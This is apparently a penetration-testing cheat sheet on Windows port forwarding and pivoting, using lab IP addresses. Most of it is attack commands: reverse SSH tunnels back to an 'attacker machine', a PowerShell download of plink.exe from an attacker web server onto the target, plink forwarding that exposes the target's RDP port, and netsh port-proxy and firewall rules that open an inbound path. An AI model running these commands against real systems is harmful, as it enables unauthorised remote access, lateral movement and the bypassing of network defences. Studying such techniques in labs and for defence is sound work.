2. Windows Port Forwarding

• OpenSSH comes with Windows since April 2018
• On machines with SSH installed you find: scp.exe, sftp.exe, ssh.exe, etc. in %systemdrive%\Windows\System32\OpenSSH

SSH Remote Dynamic Port Forwarding:

1. Start SSH server on attacker machine:

sudo systemctl start ssh

2. Locate ssh.exe in cmd on target:

where ssh

3. Check version of ssh:

ssh.exe -V

4. Set up port forwarding:

ssh -N -R 2345 crabfeather@192.168.45.180

5. Use with proxychains and win!

Plink.exe Remote Port Forwarding + RDP binding:

1. Download the plink.exe binary to the target:

#Start server:
sudo systemctl start apache2

#Download binary:
powershell wget -Uri http://192.168.45.X/plink.exe -OutFile C:\Windows\Temp\plink.exe

2. Start port forwarding (use Windows' loopback IP + its listening RDP port to be able to use RDP from kali):

cmd.exe /c echo y | C:\Windows\Temp\plink.exe -ssh -l <kaliuser> -pw <kalipassword> -R 127.0.0.1:2345:<outip>:<outport> <kali-ip>

Example: Port forwarding using Windows' loopback IP + its listening RDP port to be able to use RDP from kali:

cmd.exe /c echo y | C:\Windows\Temp\plink.exe -ssh -l <kaliuser> -pw <kalipassword> -R 127.0.0.1:4455:127.0.0.1:3389 <kali-ip>

Netsh local port forwarding + firewall poking:

• Requires Administrative privs

1. Set up port forwarding:

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.230.64 connectport=22 connectaddress=10.4.230.215

2. Confirm it is working:

netsh interface portproxy show all

3. Poke hole in firewall outwards:

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.230.64 localport=2222 action=allow

4. Delete rules afterwards:

netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64